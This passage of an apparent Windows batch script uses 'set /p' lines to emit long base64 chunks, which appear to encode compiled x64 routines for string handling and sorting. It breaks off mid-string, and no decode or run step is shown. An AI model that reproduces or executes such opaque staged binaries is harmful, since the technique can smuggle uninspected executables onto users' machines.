set /p =SIXSddMPHwBBD7ZJ/0n/yUiNBCRBiApJ/8JMO8h16UHGAgBIi8NIg8QgW8PMzMzMzMzMzMzMzMxAU0iD7CBMi9JMi9lMi8lIhdJ5DUn30sYBLUyNSQFJ/8JMjQQkSLvNzMzMzMzMzJBIi8NJ/8BJ9+JIweoDD7bCwOACjQwQAslEKtFBgMIwRYhQ/0yL0kiF0nXVDx9EAABBD7ZA/0n/yEn/wUGIQf9IjQQkTDvAdehBxgEASYvDSIPEIFvDzMzMzMzMzMzMzMxIiVwkCEiJdCQQV0iD7CBIi9m+QAAAAIvO6MLiAABIi9NIi8hIi/joRP///0iDyf8zwPKuSPfRSP/JK/GLzkiLXCQwSIt0JDhIg8QgX+ku5AAAzMzMzMzMzMzMzMzMzMxIiVwkCEiJbCQQSIl0JBhIiXwkIEFUSIPsIDPbRYvgSIvxjXsgSIXSdAMPvjro/uEAAIvoSIX2dEhED7YGM8lMi85Ii9ZFhMB0N2YPH0QAAEEPvsA7x3UOhcl1DEyLyrkBAAAA6wIzyUQPtkIBSP/C/8NFhMB12YXJdAZEK8pBA9lBi9SLy+j14QAASIv4he10CovN6JfiAABIi/CF23QQRIvDSIvWSIvP6KLiAADrA8YHAEiLXCQwSItsJDhIi3QkQEiLfCRISIPEIEFcw8zMSIvRM8lIhdIPhNYAAABmkA+2AjwgdAQ8CXUFSP/C6/APtgI8LXUIQbgBAAAA6wdEi8E8K3UDSP/CD7YCPCR1VQ+2QgFI/8I8MHwEPDl+FDxBfAQ8Rn4MPGEPjH0AAAA8Zn95PDB8FTw5fxFIg8H9SA++wEjB4QRIA8jrxEgDyTxhSA++wHwHSI1MyKnrskiNTMjJ66s8JXUkD7ZCAUj/wjwwfDg8MX80SA++wEj/wkiNTEjQD7YCPDB96esfPDB8Gzw5fxdID77ASP/CSI0MiUiNTEjQD7YCPDB95UWFwHQDSPfZSIvBw8zMzMzMzMzMSIPsKEiFyXRxSIXSdGyAOQB0Z4A6AHRiSIlcJCBIi9lI/8GAOQB1+CvLQYP4AX0IQbgBAAAA6wlEO8F+BESNQQFJY8BIjUwY/0H2wQF0B+j8BQAA6wXoTewAAEiFwHQQSCvDSItcJCBI/8BIg8Qow0iLXCQgSIPEKMMzwEiDxCjDzMzMzMzMzMzMzMzMzMzMQFNIg+wgSIvZSIvBSIXJdE5IhdJ0SYA5AHREgDoAdD9I/8CAOAB1+CvBQYP4AX0IQbgBAAAA6wlEO8B+BESNQAFJY8BIjUwI/+jK6wAASIXAdAxIK8NI/8BIg8QgW8MzwEiDxCBbw8zMzMzMzMzMzEBTSIPsIEiL2bkBAAAASIvDSIXbdD5IhdJ0OYA7AHQ0gDoAdC9I/8CAOAB1+CvDO8F9A41IAUhjwUiNTBj/6GXrAABIhcB0DEgrw0j/wEiDxCBbwzPASIPEIFvDzMzMzEiJXCQIRTPJSIvaSIXJdGBIhdJ0W0QPthpFhNt0Ug+2AYTAdEtI/8FBOsN1PA+2EUiNQwFMi9GE0nQhDx9EAABED7YARYTAdBhBOtB1Dg+2UQFI/8FI/8CE0nXkgDgAdQVB/8HrA0mLyg+2AYTAdbVIi1wkCEljwcPMzMzMzMzMSIlcJAhIiWwkEEiJdCQYV0FUQVVIg+wgQYv4i9pIi/HoS/r//0iLzkiL6DPAhdsPSNhEi+U760QPT+PoUN4AAIvXQYvMRIvo6JPeAABIi9hFhe10C0GLzegz3wAASIvwSIX2dBZBK+xFi8RIi8tIY9VIA9boN98AAOsDxgMASItcJEBIi2wkSEiLdCRQSIPEIEFdQVxfw8zMzMzMzMzMzEiJXCQQSIlsJBhIiXQkIFdBVEFVQVZBV0iD7EBFi/FFi/hIi+pIi9lIhcl0G0iDyf8zwEiL+/KuSPfRSP/JSIvxSIlMJCDrBzP2SIl0JCBIi8vomd0AAEiLzYv46I/dAACLlCSYAAAAi85Ei+CJRCRw6MrdAABIi/CF/3QKi8/obN4AAEiL2EWF5HQLQYvM6FzeAABIi+hMi+5IhdsPhFgBAACAOwAPhE8BAABIhe0PhCMBAACAfQAAD4QZAQAASIPJ/zPASIv98q5IiVwkMEj30UyNYf85RCRwdDhMY8FIiw2mYAEAM9L/FeJQAQBIi9BIiUQkKEgr1Q8fgAAAAAAPtk0ASP/FiEwq/4TJdfFIi+jrCkiLRCRwSIlEJChB9scBSI0FBekAAEyNPeboAABMD0X4QYP+AX4bQY1G/0iL00iLzkhj+EyLx+jT6AAASAP3SAPfgDsAdFyLvCSQAAAATWPkTYvESIvVSIvLQf/XhcB1MUkD3IP//3Q1/8+F/38vSItsJCBIi9NIi85IY/1IK/tIA3wkMEyLx+iC6AAASAP36xYPtgNI/8ZI/8OIRv+AOwB1rkiLbCQgg3wkcAB0PkyLRCQoSIsNvl8BADPS/xUCUAEA6yhIi9ZIK9NmkA+2A0j/w4hEGv+EwHXySItsJCBIY8VIA/DrBUiLbCQgRCvuQo1MLQDo090AAEyNXCRAxgYASYtbOEmLa0BJi3NISYvjQV9BXkFdQVxfw8zMSIPsOItEJGCJRCQox0QkIP/////ot/3//0iDxDjDzMxIg+w4RIlMJChBuQEAAADHRCQg/////+iU/f//SIPEOMPMzMzMzMzMzMzMzMzMzMxIg+w4RIlEJChBuQEAAABFM8DHRCQg/////+hh/f//SIPEOMPMzMzMzMzMzMzMzMxIiVwkCEiJbCQQSIl0JBhXSIPsIIv6SIvx6AL3//9Ii85Ii9joF9sAAIvXi8uL6Ohc2wAASIvYhe10CovN6P7bAABIi/BIhfZ0H0iLy0grzg+2Bkj/xohEMf+EwHXySIvL/xWRUAEA6wPGAwBIi1wkMEiLbCQ4SIt0JEBIg8QgX8PMzMzMzMzMzMzMzMzMzMxIiWwkGEiJfCQgQVRIg+wgSYv4SIvqTIvhTYXAdRMzwEiLbCRASIt8JEhIg8QgQVzDSIlcJDBMK+JIiXQkOGaQD7ZNAEEPtjQsSP/F/xUeUAEAi84Pttj/FRNQAQAPtsArw3UKQIT2dAVI/8910kiLdCQ4SItcJDBIi2wkQEiLfCRISIPEIEFcw8zMzMzMzMxIiVwkCFVWV0FUQVVBVkFXSIPsIA+2AkiL2UyNegGEwA+EjAAAAA+2yP8VsU8BAEiDyf9Ji/9Mi/AzwPKuSPfRSP/JSIv5SIlMJHAPH0QAAA+2A0j/w4TAdHoPtsj/FX1PAQBBOsZ16EiL902L70iF/3Q8TIvjTSvnDx+AAAAAAEEPtk0AQw+2LCxJ/8X/FU1PAQCLzQ+2+P8VQk8BAA+2yCvPdSVAhO10BUj/znXRSP/LSIvDSItcJGBIg8QgQV9BXkFdQVxfXl3DSIt8JHDpfP///zPA693MzMzMzMzMzEiJVCQQSIlMJAhVU1ZIi+xIg+xASYvxSYvYTIvRSYP4AnUzSIsCTIsJRA+2BAZFOAQxD4M2AQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODgEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBdmZmYPH4QAAAAAAEj/yUiLAEiJRTB19EiLQAhIK99IjVXgTIvDSYvKSIlF4OhK////SItVKEiNTTBMi85Mi8foN////0yLVSBIi1UwTYsaSI1N6EyJXeBIhdt0VEiF/w+EjAAAAA+2BDJBOAQzch9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1rEiF/3QhZg8fRAAASP/PSIkRSItFMEiJSAhIi00wSIsRSIlVMHXlSItF6EiLfCR4SYkCSItFKEiJCEiDxEBeW13DSIXbdOAPH0QAAEj/y0yJGUiLReBIiUgISItN4EyLGUyJXeB15eu+zMzMSIlUJBBIiUwkCFVTVkiL7EiD7EBJi/FJi9hMi9FJg/gCdTNIiwJMiwlED7YEBkU4BDEPhjYBAABIiQFMiQpIiwFMiQhIiwpJiwJIiUEISIPEQF5bXcNIg/sCD44OAQAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0F2ZmZg8fhAAAAAAASP/JSIsASIlFMHX0SItACEgr30iNVeBMi8NJi8pIiUXg6Er///9Ii1UoSI1NMEyLzkyLx+g3////TItVIEiLVTBNixpIjU3oTIld4EiF23RUSIX/D4SMAAAAD7YEMkE4BDN3H0yJGUiLReBI/8tIiUgISItN4EiLVTBMixlMiV3g6x1IiRFIi0UwSP/PSIlICEiLTTBMi13gSIsRSIlVMEiF23WsSIX/dCFmDx9EAABI/89IiRFIi0UwSIlICEiLTTBIixFIiVUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1M0iLAkyLCUQPtgQGRTgEMQ+NNgEAAEiJAUyJCkiLAUyJCEiLCkmLAkiJQQhIg8RAXltdw0iD+wIPjg4BAABIiXwkeEiLw0iL+0iZSCvCSNH4SIvISCv4SYsCSIlFMEiFyXQXZmZmDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFRIhf8PhIwAAAAPtgQyQTgEM3wfTIkZSItF4Ej/y0iJSAhIi03gSItVMEyLGUyJXeDrHUiJEUiLRTBI/89IiUgISItNMEyLXeBIixFIiVUwSIXbdaxIhf90IWYPH0QAAEj/z0iJEUiLRTBIiUgISItNMEiLEUiJVTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEiJVCQQSIlMJAhVU1ZIi+xIg+xASYvxSYvYTIvRSYP4AnUzSIsCTIsJRA+2BAZFOAQxD442AQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODgEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBdmZmYPH4QAAAAAAEj/yUiLAEiJRTB19EiLQAhIK99IjVXgTIvDSYvKSIlF4OhK////SItVKEiNTTBMi85Mi8foN////0yLVSBIi1UwTYsaSI1N6EyJXeBIhdt0VEiF/w+EjAAAAA+2BDJBOAQzfx9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1rEiF/3QhZg8fRAAASP/PSIkRSItFMEiJSAhIi00wSIsRSIlVMHXlSItF6EiLfCR4SYkCSItFKEiJCEiDxEBeW13DSIXbdOAPH0QAAEj/y0yJGUiLReBIiUgISItN4EyLGUyJXeB15eu+zMzMSIlUJBBIiUwkCFVTVkiL7EiD7EBJi/FJi9hMi9FJg/gCdTRIiwJMiwlED7cEBmZFOQQxD401AQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODQEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBZmZg8fhAAAAAAASP/JSIsASIlFMHX0SItACEgr30iNVeBMi8NJi8pIiUXg6Er///9Ii1UoSI1NMEyLzkyLx+g3////TItVIEiLVTBNixpIjU3oTIld4EiF23RVSIX/D4SMAAAAD7cEMmZBOQQzfB9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1q0iF/3QgDx9EAABI/89IiRFIi0UwSIlICEiLTTBIixFIiVUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1NEiLAkyLCUQPtwQGZkU5BDEPjjUBAABIiQFMiQpIiwFMiQhIiwpJiwJIiUEISIPEQF5bXcNIg/sCD44NAQAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0FmZmDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFVIhf8PhIwAAAAPtwQyZkE5BDN/H0yJGUiLReBI/8tIiUgISItN4EiLVTBMixlMiV3g6x1IiRFIi0UwSP/PSIlICEiLTTBMi13gSIsRSIlVMEiF23WrSIX/dCAPH0QAAEj/z0iJEUiLRTBIiUgISItNMEiLEUiJVTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEiJVCQQSIlMJAhVU1ZIi+xIg+xASYvxSYvYTIvRSYP4AnUySIsCTIsJRIsEBkU5BDEPjScBAABIiQFMiQpIiwFMiQhIiwpJiwJIiUEISIPEQF5bXcNIg/sCD47/AAAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0DEj/yUiLAEiJRTB19EiLQAhIK99IjVXgTIvDSYvKSIlF4OhW////SItVKEiNTTBMi85Mi8foQ////0yLVSBIi1UwTYsaSI1N6EyJXeBIhdt0U0iF/w+EiAAAAIsEMkE5BDN8H0yJGUiLReBI/8tIiUgISItN4EiLVTBMixlMiV3g6x1IiRFI
set /p =i0UwSP/PSIlICEiLTTBMi13gSIsRSIlVMEiF23WtSIX/dB4PHwBI/89IiRFIi0UwSIlICEiLTTBIixFIiVUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1MkiLAkyLCUSLBAZFOQQxD44nAQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+O/wAAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdAxI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoVv///0iLVShIjU0wTIvOTIvH6EP///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFNIhf8PhIgAAACLBDJBOQQzfx9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1rUiF/3QeDx8ASP/PSIkRSItFMEiJSAhIi00wSIsRSIlVMHXlSItF6EiLfCR4SYkCSItFKEiJCEiDxEBeW13DSIXbdOAPH0QAAEj/y0yJGUiLReBIiUgISItN4EyLGUyJXeB15eu+zMzMSIlUJBBIiUwkCFVTVkiL7EiD7EBJi/FJi9hMi9FJg/gCdTVIiwJMiwHzQQ8QBAFDDy8ECA+GNAEAAEiJAUyJAkiLAUyJAEiLCkmLAkiJQQhIg8RAXltdw0iD+wIPjgwBAABIiXwkeEiLw0iL+0iZSCvCSNH4SIvISCv4SYsCSIlFMEiFyXQVZg8fhAAAAAAASP/JSIsASIlFMHX0SItACEgr30iNVeBMi8NJi8pIiUXg6Er///9Ii1UoSI1NMEyLzkyLx+g3////TItVIEiLRTBNixpIjU3oTIld4EiF23RWSIX/D4SMAAAA80EPEAQzDy8EMHIfTIkZSItF4Ej/y0iJSAhIi03gSItFMEyLGUyJXeDrHUiJAUiLRTBI/89IiUgISItNMEyLXeBIiwFIiUUwSIXbdapIhf90Hw8fQABI/89IiQFIi0UwSIlICEiLTTBIiwFIiUUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1NUyLAUiLAvNDDxAECEEPLwQBD4Y0AQAASIkBTIkCSIsBTIkASIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODAEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBVmDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItFME2LGkiNTehMiV3gSIXbdFZIhf8PhIwAAADzDxAEMEEPLwQzch9MiRlIi0XgSP/LSIlICEiLTeBIi0UwTIsZTIld4OsdSIkBSItFMEj/z0iJSAhIi00wTItd4EiLAUiJRTBIhdt1qkiF/3QfDx9AAEj/z0iJAUiLRTBIiUgISItNMEiLAUiJRTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEyJTCQgSIlUJBBIiUwkCFVTVldIi+xIg+xISYvZSYv4SIvxSYP4AnVFSIsJSIt9MEiLF0qLDAlKixQK/xUPWQEAhcAPiXQBAABIiwdIiw5IiQZIiQ9IiwZIiQhIiw9IiwZIiUEISIPESF9eW13DD45JAQAATItVKEmLwEmL8EiZSCvCSNH4SIvISCvwSYsCSIlFOEiFyXQUDx+EAAAAAABI/8lIiwBIiUU4dfRIi0AISCv+SI1V2EyLx0mLykiJRdjoOv///0iLVTBIjU04TIvLTIvG6Cf///9Ii00oSItFOEyLGUiNXeBMiV3YSIX/dGxIhfYPhIUAAABIi01ASIsUCEmLDAv/FURYAQCFwHgjSItF2Ej/z0iJA0iLRdhIiVgISItd2EiLRThMixtMiV3Y6yFIi0U4SP/OSIkDSItFOEiJWAhIi104TItd2EiLA0iJRThIhf91mEiLTShIhfZ0TUj/zkiJA0iLRThIiVgISItdOEiLA0iJRTh15eswSIX/dCdmZmZmDx+EAAAAAABI/89MiRtIi0XYSIlYCEiLXdhMixtMiV3YdeVIi00oSItF4EiJAUiLRTBIiRhIg8RIX15bXcPMzMzMzMzMzMzMTIlMJCBIiVQkEEiJTCQIVVNWV0iL7EiD7EhJi9lJi/hIi/FJg/gCdUVIiwlIi30wSIsXSosMCUqLFAr/FT9XAQCFwA+OdAEAAEiLB0iLDkiJBkiJD0iLBkiJCEiLD0iLBkiJQQhIg8RIX15bXcMPjkkBAABMi1UoSYvASYvwSJlIK8JI0fhIi8hIK/BJiwJIiUU4SIXJdBQPH4QAAAAAAEj/yUiLAEiJRTh19EiLQAhIK/5IjVXYTIvHSYvKSIlF2Og6////SItVMEiNTThMi8tMi8boJ////0iLTShIi0U4TIsZSI1d4EyJXdhIhf90bEiF9g+EhQAAAEiLTUBIixQISYsMC/8VdFYBAIXAfyNIi0XYSP/PSIkDSItF2EiJWAhIi13YSItFOEyLG0yJXdjrIUiLRThI/85IiQNIi0U4SIlYCEiLXThMi13YSIsDSIlFOEiF/3WYSItNKEiF9nRNSP/OSIkDSItFOEiJWAhIi104SIsDSIlFOHXl6zBIhf90J2ZmZmYPH4QAAAAAAEj/z0yJG0iLRdhIiVgISItd2EyLG0yJXdh15UiLTShIi0XgSIkBSItFMEiJGEiDxEhfXltdw8zMzMzMzMzMzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1M0iLAkyLCUQPtgQGRTgEMQ+DNgEAAEiJAUyJCkiLAUyJCEiLCkmLAkiJQQhIg8RAXltdw0iD+wIPjg4BAABIiXwkeEiLw0iL+0iZSCvCSNH4SIvISCv4SYsCSIlFMEiFyXQXZmZmDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFRIhf8PhIwAAAAPtgQyQTgEM3IfTIkZSItF4Ej/y0iJSAhIi03gSItVMEyLGUyJXeDrHUiJEUiLRTBI/89IiUgISItNMEyLXeBIixFIiVUwSIXbdaxIhf90IWYPH0QAAEj/z0iJEUiLRTBIiUgISItNMEiLEUiJVTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEiJVCQQSIlMJAhVU1ZIi+xIg+xASYvxSYvYTIvRSYP4AnUzSIsCTIsJRA+2BAZFOAQxD4Y2AQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODgEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBdmZmYPH4QAAAAAAEj/yUiLAEiJRTB19EiLQAhIK99IjVXgTIvDSYvKSIlF4OhK////SItVKEiNTTBMi85Mi8foN////0yLVSBIi1UwTYsaSI1N6EyJXeBIhdt0VEiF/w+EjAAAAA+2BDJBOAQzdx9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1rEiF/3QhZg8fRAAASP/PSIkRSItFMEiJSAhIi00wSIsRSIlVMHXlSItF6EiLfCR4SYkCSItFKEiJCEiDxEBeW13DSIXbdOAPH0QAAEj/y0yJGUiLReBIiUgISItN4EyLGUyJXeB15eu+zMzMSIlUJBBIiUwkCFVTVkiL7EiD7EBJi/FJi9hMi9FJg/gCdTZIiwJMiwHyQQ8QBAFmQw8vBAgPhjMBAABIiQFMiQJIiwFMiQBIiwpJiwJIiUEISIPEQF5bXcNIg/sCD44LAQAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0FA8fhAAAAAAASP/JSIsASIlFMHX0SItACEgr30iNVeBMi8NJi8pIiUXg6Er///9Ii1UoSI1NMEyLzkyLx+g3////TItVIEiLRTBNixpIjU3oTIld4EiF23RXSIX/D4SMAAAA8kEPEAQzZg8vBDByH0yJGUiLReBI/8tIiUgISItN4EiLRTBMixlMiV3g6x1IiQFIi0UwSP/PSIlICEiLTTBMi13gSIsBSIlFMEiF23WpSIX/dB4PHwBI/89IiQFIi0UwSIlICEiLTTBIiwFIiUUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1NkyLAUiLAvJDDxAECGZBDy8EAQ+GMwEAAEiJAUyJAkiLAUyJAEiLCkmLAkiJQQhIg8RAXltdw0iD+wIPjgsBAABIiXwkeEiLw0iL+0iZSCvCSNH4SIvISCv4SYsCSIlFMEiFyXQUDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItFME2LGkiNTehMiV3gSIXbdFdIhf8PhIwAAADyDxAEMGZBDy8EM3IfTIkZSItF4Ej/y0iJSAhIi03gSItFMEyLGUyJXeDrHUiJAUiLRTBI/89IiUgISItNMEyLXeBIiwFIiUUwSIXbdalIhf90Hg8fAEj/z0iJAUiLRTBIiUgISItNMEiLAUiJRTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEiJVCQQSIlMJAhVU1ZIi+xIg+xASYvxSYvYTIvRSYP4AnUySIsCTIsJTIsEBk05BDEPjScBAABIiQFMiQpIiwFMiQhIiwpJiwJIiUEISIPEQF5bXcNIg/sCD47/AAAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0DEj/yUiLAEiJRTB19EiLQAhIK99IjVXgTIvDSYvKSIlF4OhW////SItVKEiNTTBMi85Mi8foQ////0yLVSBIi1UwTYsaSI1N6EyJXeBIhdt0VEiF/w+EiAAAAEiLBDJJOQQzfB9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1rEiF/3QdZpBI/89IiRFIi0UwSIlICEiLTTBIixFIiVUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1MkiLAkyLCUyLBAZNOQQxD44nAQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+O/wAAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdAxI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mLykiJReDoVv///0iLVShIjU0wTIvOTIvH6EP///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFRIhf8PhIgAAABIiwQySTkEM38fTIkZSItF4Ej/y0iJSAhIi03gSItVMEyLGUyJXeDrHUiJEUiLRTBI/89IiUgISItNMEyLXeBIixFIiVUwSIXbdaxIhf90HWaQSP/PSIkRSItFMEiJSAhIi00wSIsRSIlVMHXlSItF6EiLfCR4SYkCSItFKEiJCEiDxEBeW13DSIXbdOAPH0QAAEj/y0yJGUiLReBIiUgISItN4EyLGUyJXeB15eu+zMzMSIlUJBBIiUwkCFVTVkiL7EiD7EBJi/FJi9hMi9FJg/gCdTRIiwJMiwlED7cEBmZFOQQxD4M1AQAASIkBTIkKSIsBTIkISIsKSYsCSIlBCEiDxEBeW13DSIP7Ag+ODQEAAEiJfCR4SIvDSIv7SJlIK8JI0fhIi8hIK/hJiwJIiUUwSIXJdBZmZg8fhAAAAAAASP/JSIsASIlFMHX0SItACEgr30iNVeBMi8NJi8pIiUXg6Er///9Ii1UoSI1NMEyLzkyLx+g3////TItVIEiLVTBNixpIjU3oTIld4EiF23RVSIX/D4SMAAAAD7cEMmZBOQQzch9MiRlIi0XgSP/LSIlICEiLTeBIi1UwTIsZTIld4OsdSIkRSItFMEj/z0iJSAhIi00wTItd4EiLEUiJVTBIhdt1q0iF/3QgDx9EAABI/89IiRFIi0UwSIlICEiLTTBIixFIiVUwdeVIi0XoSIt8JHhJiQJIi0UoSIkISIPEQF5bXcNIhdt04A8fRAAASP/LTIkZSItF4EiJSAhIi03gTIsZTIld4HXl677MzMxIiVQkEEiJTCQIVVNWSIvsSIPsQEmL8UmL2EyL0UmD+AJ1NEiLAkyLCUQPtwQGZkU5BDEPhjUBAABIiQFMiQpIiwFMiQhIiwpJiwJIiUEISIPEQF5bXcNIg/sCD44NAQAASIl8JHhIi8NIi/tImUgrwkjR+EiLyEgr+EmLAkiJRTBIhcl0FmZmDx+EAAAAAABI/8lIiwBIiUUwdfRIi0AISCvfSI1V4EyLw0mL
set /p =ykiJReDoSv///0iLVShIjU0wTIvOTIvH6Df///9Mi1UgSItVME2LGkiNTehMiV3gSIXbdFVIhf8PhIwAAAAPtwQyZkE5BDN3H0yJGUiLReBI/8tIiUgISItN4EiLVTBMixlMiV3g6x1IiRFIi0UwSP/PSIlICEiLTTBMi13gSIsRSIlVMEiF23WrSIX/dCAPH0QAAEj/z0iJEUiLRTBIiUgISItNMEiLEUiJVTB15UiLRehIi3wkeEmJAkiLRShIiQhIg8RAXltdw0iF23TgDx9EAABI/8tMiRlIi0XgSIlICEiLTeBMixlMiV3gdeXrvszMzEiFyQ+EtgIAAFVTVkFUQVVIi+xIg+wwSIsBRYvpQYvYi/JMi+FIhcAPhIYCAABIiXwkaEyJdCRwTIt1UEmD/v91D0iLSQhJi3wkIEiJRTDrQUmL1uhvMgAASIt9WEmLzEiL10iJRTDoXDIAAEkr/kj/x0iDfTAASIvID4QqAgAASIXAD4QhAgAASINtMBBIg+kQSItFMEiJTfBMizGDwxBMiXwkeEyLeAhBg/3/dQVFi2wkWEH/zUGD/RgPh6kBAABIjRX4cP//SWPFi4yCBJEAAEgDyv/hTGPLTIvHSI1V8EiNTTBA9sYBdArocN7//+l1AQAA6Abg///pawEAAExjy0yLx0iNVfBIjU0wQPbGAXQK6Ijh///pTQEAAOge4///6UMBAABMY8tMi8dIjVXwSI1NMED2xgF0Cuig5P//6SUBAADoNub//+kbAQAATGPLTIvHSI1V8EiNTTBA9sYBdArouOf//+n9AAAA6D7p///p8wAAAEiNDfIHAABA9sYCSI0FpwcAAEgPRcFMY8tMi8dIiQU2RwEASI1V8EiNTTBA9sYBdAro0+3//+m4AAAA6Jnv///prgAAAExjy0yLx0iNVfBIjU0wQPbGAXQK6Gvq///pkAAAAOgB7P//6YYAAABMY8tMi8dIjVXwSI1NMED2xgF0B+gj8f//62vovPL//+tkTGPLTIvHSI1V8EiNTTBA9sYBdAfoQfT//+tJ6Nr1///rQkxjy0yLx0iNVfBIjU0wQPbGAXQH6F/3///rJ+jo+P//6yBMY8tMi8dIjVXwSI1NMED2xgF0B+hd+v//6wXo9vv//0iLRTBMiXgISItF8EyJMEiLRTBNhf91BkmJBCTrA0mJB0yLfCR4SItF8E2F9nUHSYlEJAjrBEmJRghBxkQkXAFIi3wkaEyLdCRwSIPEMEFdQVxeW13zww8fAD+PAACqkAAAZ48AAKqQAACPjwAAqpAAAKqQAAC3jwAA/I8AAKqQAAAkkAAARpAAAGiQAACqkAAAqpAAAKqQAACqkAAAqpAAAKqQAACqkAAAaJAAAKqQAACqkAAAF48AAIqQAADMzMzMzMzMzEiD7DhIx0QkKP////9Ix0QkIP/////otfz//0iDxDjDSIXJD4S1AgAASIlcJBhIiXQkIFVXQVRIi+xIg+wwSIsBSYvZTYvgi/pIi/FIhcAPhHcCAABJg/j/dQ5Ii1EISItZIEiJRSDrPUmL0OgnL